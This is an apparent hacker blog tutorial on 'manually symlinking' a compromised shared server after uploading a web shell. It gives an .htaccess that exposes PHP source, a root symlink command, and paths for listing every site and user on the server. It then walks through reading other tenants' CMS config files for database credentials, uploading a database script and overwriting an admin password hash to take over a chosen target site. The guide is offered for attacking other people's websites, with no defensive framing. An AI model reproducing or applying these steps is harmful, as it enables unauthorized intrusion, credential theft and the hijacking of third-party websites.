Shelled Server
Readable /ect/named.conf
Sup bitches!? ..If you're reading this, your probably wondering how we manually symlink w/out using an automated script. Well today I'm going to show you how It's done.
Tutorial:
Creating a ROOT Symlink:
1.) After you Upload your Shell, open it and go to the Root Folder of the Website (i.e Public_html) and make a dir called "tmp"
2.) Open your tmp directory and then create a file called ".htaccess" in the /tmp/ directory, and cut-n-paste this code in it and click "Save"
PHP Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html Require None
Satisfy Any
3.)Next, Execute this command in your shell to create a root symlink in tmp Directory
PHP Code:
ln -s / mobile
This will Create a link called /mobile/ in tmp Directory.
2.) Now open the directory "tmp" from Your browser in new tab, like:
Quote:http://www.site.com/tmp
..it should look like this;
5.) If You see this, that means you have Created a Root Symlink, Congrats , Server has been Symlinked Successfully.
Getting all the websites from the server:
1.) Ok you've created a root symlink, now its time to get all the websites from the server.
From your browser open a new tab and enter this link.
Quote:http://www.site.com/tmp/mcs/var/named
2.) This will give you all the sites on the Server.
Getting all the Users from the Server:
1.) From your browser open a new tab and enter this link.
Quote:http://www.site.com/tmp/mcs/var/mail/
2.) This will give you all the Users from the server.
Finding the User on a targeted Website:
1.) Now that you have all the sites and users on the server, Now Select a target that you wanna take down and find the user of the target ..Example: if my target is "www.besearched.biz" so the user will be something like "besearch" or "besearch3" or something similar.
2.) And an easy way to find the username is to press control+f in your browser and type the site name slowly besearched.com and It should highlight the user.
Dumping and Reading the Database configs:
2.) Open this Link in your Browser:
Quote:http://www.site.com/tmp/mobile/home/[user]/public_html/[user] is the user of the targeted website.
EXAMPLE:
3.) Next start looking for the Config file, mine is wp-config.php Just Click on it and You will get Database Login info.
Location of Most Famous CMS config Files:
Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
Login into Database:
1.) Now Upload a Database Management .php Script. (i.e dbkiss.php) in root folder (i.e Public_html)
DBkiss.php
Quote:http://pastebin.com/cYNQ35KR
2.) Open dbkiss.php in your Browser.
Quote:http://www.site.com/dbkiss.php
Change admin Password From Database:
1.) Login with the Username and password you got from the Config file.
2.) Check for users in the database and click on it ..there you will get a website Username and password . we just have to edit user_pass column and save it.
3.) Go to a MD5 Generator:
Quote:http://www.md5hashgenerator.comHash you a password with anything you want in MD5, then click on edit , Clear the user_pass column and paste your MD5 hash there, again click on edit and save it..finally your done.
4.) Now go to the Website admin panel, and login with the new password You just created.
Owned!
Congratulations! You just MANUALLY symlinked
No comments:
Post a Comment